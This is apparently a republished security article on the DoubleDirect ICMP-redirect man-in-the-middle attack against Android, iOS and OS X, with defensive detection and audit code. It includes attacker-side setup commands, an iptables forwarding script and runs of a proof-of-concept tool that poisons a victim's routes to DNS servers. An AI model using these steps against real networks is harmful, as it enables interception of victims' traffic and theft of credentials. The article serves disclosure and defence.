DoubleDirect man-in-the-middle attacks on Android and iOS Systems

Source: Internet
Author: User

Security researchers have discovered a new man-in-the-middle attack technique targeting smartphones and tablets running Android and iOS.

The technique, known as DoubleDirect, is a type of man-in-the-middle (MITM) attack. Attackers can use it to redirect a victim's traffic to Google, Facebook, and Twitter through a device under their control. Once the victim's traffic is redirected, the attacker can steal personal data such as email IDs, logon credentials, and banking information, and can also install trojans and other malware on the victim's machine.

Zimperium, a mobile security company in San Francisco, detailed the threat on its blog. Attackers are using DoubleDirect to launch targeted attacks in 31 countries, including the United States, Britain, and Canada. The five most-targeted services are Google, Facebook, Hotmail, Live.com, and Twitter.

Full-duplex ICMP redirection man-in-the-middle attack

ICMP redirect attacks are a type of MITM attack. Traditional ICMP redirect attacks and the tools that implement them (ettercap, for example) are half-duplex MITM attacks: the victim is spoofed with ICMP redirects, while the router is poisoned with ARP spoofing. This kind of ICMP attack is easily defeated by the usual defences against ARP spoofing.

DoubleDirect is different. It uses ICMP (Internet Control Message Protocol) redirect packets to change the host's routing table. An ICMP redirect tells the host that there is a better next hop for reaching a destination. By changing the routing table on the victim's machine, the attacker can make the victim's traffic for arbitrary destinations flow to a chosen IP address (for example, the attacker's own), and from there mount a man-in-the-middle attack. Once the traffic is redirected, the attacker can also exploit client-side vulnerabilities on the victim's device and pivot into the victim's network.

By studying DoubleDirect attacks, we found that attackers have implemented a full-duplex ICMP redirect man-in-the-middle attack using a previously unknown technique. Traditional ICMP redirect attacks are limited to half-duplex operation.
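Detection logic for the redirect messages described above, written as an added example (not code from the original post or from Zimperium): it decodes a raw IPv4 packet, recognises an ICMP redirect (type 5), pulls out the new next hop and the destination quoted from the triggering datagram, and flags the redirect when the next hop is not a trusted router or the re-routed destination is one of the public DNS resolvers the post names. The sample packets and the trusted router set are constructed for this example; checksums are not validated.

```python
import ipaddress

ICMP_REDIRECT = 5
REDIRECT_CODES = {0: "network", 1: "host", 2: "network/TOS", 3: "host/TOS"}
# Resolvers the post's tool redirects first; a redirect for one of them is the DoubleDirect pattern.
PUBLIC_RESOLVERS = {"8.8.8.8", "8.8.4.4", "208.67.222.222", "208.67.220.220"}


def _ipv4_fields(hdr):
    """Return (header length, protocol, src, dst) of a raw IPv4 header."""
    ihl = (hdr[0] & 0x0F) * 4
    return ihl, hdr[9], str(ipaddress.IPv4Address(hdr[12:16])), str(ipaddress.IPv4Address(hdr[16:20]))


def inspect_redirect(pkt, trusted_routers):
    """Classify one raw IPv4 packet: None unless it is an ICMP redirect, otherwise a dict
    with the redirect's fields and the reasons (if any) it looks suspicious."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl, proto, src, dst = _ipv4_fields(pkt)
    if proto != 1 or len(pkt) < ihl + 8 or pkt[ihl] != ICMP_REDIRECT:
        return None
    icmp = pkt[ihl:]
    new_gw = str(ipaddress.IPv4Address(icmp[4:8]))
    # The redirect quotes the IP header of the datagram that triggered it; its
    # destination is the route the victim is being told to change.
    inner_dst = _ipv4_fields(icmp[8:])[3] if len(icmp) >= 28 else None
    reasons = []
    # A spoofed source address passes this check, which is why the next two checks matter.
    if src not in trusted_routers:
        reasons.append(f"sent by {src}, not a trusted router")
    if new_gw not in trusted_routers:
        reasons.append(f"points next hop at {new_gw}, not a trusted router")
    if inner_dst in PUBLIC_RESOLVERS:
        reasons.append(f"re-routes traffic for public DNS resolver {inner_dst}")
    return {"source": src, "victim": dst, "code": REDIRECT_CODES.get(icmp[1], "unknown"),
            "new_gateway": new_gw, "redirected_destination": inner_dst,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample: host redirect spoofed from the gateway 192.168.1.1 to the victim
# 192.168.1.101, moving 8.8.8.8 to 192.168.1.105 (the attacker). Checksums zeroed.
SAMPLE_REDIRECT = bytes.fromhex(
    "45000038 00000000 40010000 c0a80101 c0a80165"  # outer IPv4 header, proto 1 (ICMP)
    "05010000 c0a80169"                             # ICMP type 5 code 1, new gateway
    "4500003c 00004000 40110000 c0a80165 08080808"  # quoted header: victim -> 8.8.8.8, UDP
    "d4310035 00280000")                            # first 8 bytes of the quoted UDP datagram
# Constructed benign sample: an ICMP echo request from the victim to 8.8.8.8.
SAMPLE_ECHO = bytes.fromhex("4500001c 00000000 40010000 c0a80165 08080808 08000000 00010001")

if __name__ == "__main__":
    for pkt in (SAMPLE_REDIRECT, SAMPLE_ECHO):
        print(inspect_redirect(pkt, trusted_routers={"192.168.1.1"}))
```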

How does a DoubleDirect attack work?

After studying the attack, the Zimperium mobile security lab built a proof-of-concept tool that demonstrates a full-duplex ICMP redirect attack. The difficulty with ICMP redirect attacks is that the attacker must know in advance which IP addresses the victim communicates with.

How can an attacker learn which IP addresses the victim reaches? To answer this question, we first look at the victim's device.

For example, when we type www.zimperium.com into a browser, the application sends a DNS request to resolve the IP address of the host www.zimperium.com.

First, we use ICMP redirect packets to forward all DNS traffic from the victim's device to our device. Most of the time, we can predict which DNS servers the victim uses.

If the victim is on the same LAN as we are, the victim's DNS server is likely the same one we obtained through DHCP (Dynamic Host Configuration Protocol). Some mobile devices also use a default DNS server (8.8.8.8 or 8.8.4.4).

We also provide a simple and effective tool for studying DoubleDirect.

To compile and run this tool, you need to install libcrafter (https://code.google.com/p/libcrafter/) on the system. Libcrafter is a cross-platform C++ library for crafting, capturing and decoding packets. To compile it on GNU/Linux or Mac OS X, run the following commands:

$ git clone https://github.com/pellegre/libcrafter
$ cd libcrafter/libcrafter
$ ./autogen.sh
$ make
$ sudo make install
$ sudo ldconfig

Note that the packet capture library libpcap must be installed before configuring libcrafter:

# apt-get install libpcap-dev

DoubleDirect instance: full-duplex ICMP redirection attack

Scenario Reproduction

Gateway = 192.168.1.1

Attacker (Ubuntu) = 192.168.1.105

Victim machine (Galaxy S4) = 192.168.1.101

Victim Configuration

First, check whether the device accepts redirects. The Galaxy S4 accepts them by default:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects
1

Second, if your device does not accept ICMP redirects but you want to test the attack, run the following command:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects


Attack Host Configuration

To make the attack work, we need to run a few commands on the attacker's device:

Enable IP forwarding (this setting is temporary and is lost on reboot; to keep forwarding enabled permanently, edit /etc/sysctl.conf):

# echo 1 > /proc/sys/net/ipv4/ip_forward

Disable the sending of redirects on the attacker's machine. This is important: we must tell the attack device's kernel not to send redirects of its own:

# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

Attack demonstration

Compile the DoubleDirect_poc.cpp file:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter
$ ./doubledirect_poc
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Usage: ./doubledirect_poc [options]

POC options:
-i: network interface
-v: victim IP address
-d: destination IP address to poison

Instead of ARP spoofing on the LAN, we poison a remote IP address that the victim's machine reaches when it visits certain URLs, so that the victim's traffic for that address goes to our device instead of the real gateway.

When the device sends an IP packet destined for 8.8.8.8, it would normally pass through the gateway (192.168.1.1)...

Run the following command on the attacker's device:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[+] Destination to poison : 8.8.8.8
[#] Gateway parameters :
[+] Gateway IP address : 192.168.1.1
[+] Gateway MAC address : *:*:*:*:AE:51
[#] My parameters :
[+] My IP address : 192.168.1.105

The output above shows how we poisoned the route to 8.8.8.8 so that it points at our IP address, 192.168.1.105. When the victim sends a packet destined for 8.8.8.8, it now uses our device as the gateway, so we can sniff all traffic to that destination.

Once all DNS traffic passes through our machine, we read the resolved IP addresses out of the DNS responses and send ICMP redirects for those addresses as well. In this way we not only sniff all of the victim's DNS traffic, but also pull the traffic to the resolved hosts through our device.

To test whether you are vulnerable to DoubleDirect, we can write a shell script that enables IP forwarding and NAT with iptables:

# cat iptables_double_direct.sh
#!/bin/sh
if [ $# -lt 1 ]; then
    echo "[@] Usage: `basename ${0}` <interface>"
    echo "[@] Example: `basename ${0}` wlan0"
    exit 0
fi
INTERFACE=${1}
# Forward traffic and stop our own kernel from sending redirects on this interface
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
# Reset the firewall, then allow forwarding and masquerade outgoing traffic
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE
# ./iptables_double_direct.sh wlan0

Finally, run the Zimperium DoubleDirect attack test tool:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[#] Gateway parameters :
[+] Gateway IP address : 192.168.2.1
[+] Gateway MAC address : 00:1f:*:*:*:*
[#] My parameters :
[+] My IP address : 192.168.2.103

The DNS servers are hardcoded in the source (line 2 of DoubleDirect_poc.cpp):

// Hardcoded DNS servers we want to redirect to our machine
startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway
startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8");
startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4");
startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222");
startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220");

Response Policy

Android, iOS, and Mac OS X devices usually accept ICMP redirects by default.

To determine whether your OS X device is vulnerable to DoubleDirect, run the following command:

sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

To disable ICMP redirects on a Mac, run the following command (root permission required):

# sysctl -w net.inet.ip.redirect=0

Note: this fix is not persistent. To keep it in effect across reboots, add the command to a startup script.

Most Android devices accept redirects by default. To disable this, you need a rooted device; then run the following command:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
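An audit helper for the Linux and Android side of this check, added here as an example (not code from the original post or from Zimperium). The Linux kernel combines conf/all and conf/<interface>: on a host with forwarding off, redirects are accepted if either flag is 1, and on a forwarding host only if both are 1, so this helper evaluates the effective value per interface instead of reading conf/all alone. The sample sysctl states are constructed for this example.

```python
from pathlib import Path

CONF_DIR = Path("/proc/sys/net/ipv4/conf")
FLAGS = ("accept_redirects", "secure_redirects", "forwarding")


def load_sysctls(conf_dir=CONF_DIR):
    """Read the redirect-related flags of every interface directory into {'iface.flag': int}."""
    state = {}
    for d in conf_dir.iterdir():
        for flag in FLAGS:
            try:
                state[f"{d.name}.{flag}"] = int((d / flag).read_text().strip())
            except (OSError, ValueError):
                pass  # flag not present for this interface; treated as 0
    return state


def _flag(state, iface, name):
    return bool(state.get(f"{iface}.{name}", 0))


def accepts_redirects(state, iface):
    """Effective accept_redirects: host (forwarding off) accepts if EITHER conf/all or
    conf/<iface> is 1; router (forwarding on) accepts only if BOTH are 1."""
    all_on, if_on = _flag(state, "all", "accept_redirects"), _flag(state, iface, "accept_redirects")
    return (all_on and if_on) if _flag(state, iface, "forwarding") else (all_on or if_on)


def secure_redirects(state, iface):
    """Effective secure_redirects (on if either flag is 1): only honour redirects whose
    new gateway is already one of the interface's default gateways."""
    return _flag(state, "all", "secure_redirects") or _flag(state, iface, "secure_redirects")


def audit(state):
    """Return {iface: (accepts_redirects, secure_redirects)} for every real interface."""
    ifaces = {k.split(".")[0] for k in state} - {"all", "default"}
    return {i: (accepts_redirects(state, i), secure_redirects(state, i)) for i in sorted(ifaces)}


# Constructed state of a stock phone: every knob at its default of 1, forwarding off.
PHONE_DEFAULT = {"all.accept_redirects": 1, "all.secure_redirects": 1,
                 "wlan0.accept_redirects": 1, "wlan0.secure_redirects": 1, "wlan0.forwarding": 0}
# Constructed state after only `echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects`.
ALL_OFF_ONLY = dict(PHONE_DEFAULT, **{"all.accept_redirects": 0})
# Constructed state after also clearing conf/wlan0/accept_redirects.
BOTH_OFF = dict(ALL_OFF_ONLY, **{"wlan0.accept_redirects": 0})

if __name__ == "__main__":
    for name, st in (("phone default", PHONE_DEFAULT), ("all=0 only", ALL_OFF_ONLY), ("both=0", BOTH_OFF)):
        print(name, audit(st))
```

On a live system, `audit(load_sysctls())` reports every interface; an interface shows as safe only when its effective accept_redirects value is False.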

Which devices are affected?

Affected systems include:

Android devices: most Android devices, including the Nexus 5 with Lollipop
iOS devices: the latest iOS devices, including iOS 8.1.1
Mac: Mac OS X Yosemite

Most Windows and GNU/Linux users are not affected by DoubleDirect because these operating systems do not accept ICMP redirect packets.
